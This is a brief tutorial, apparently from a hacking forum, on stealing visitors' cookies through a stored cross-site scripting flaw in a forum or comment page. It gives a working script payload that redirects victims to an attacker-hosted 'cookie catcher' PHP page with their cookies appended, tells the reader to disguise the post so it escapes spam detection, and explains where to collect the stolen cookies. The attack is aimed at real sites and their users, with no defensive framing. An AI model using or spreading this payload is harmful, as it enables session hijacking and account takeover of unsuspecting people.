So,let us assume that we have found a XSS vulnerable forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS attack.
So now lets try to grab it's cookies.
First of all download a cookie catcher tool online by searching on google and upload it on any free hosting site which supports php .
Now come to that vulnerable site and if there is a box to type and submit then add the following code in it:
Code:<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
Replace the bold link with the link of your cookie catcher uploaded on free hosting site.
Now submit that post in the forum or the comment box and I would suggest to add some text before or after it so that it wont look like a spam.
Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php
Search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be: http://www.example.com/cookie catcher.php the container of the cookies would be: http://www.example.com/cookies.html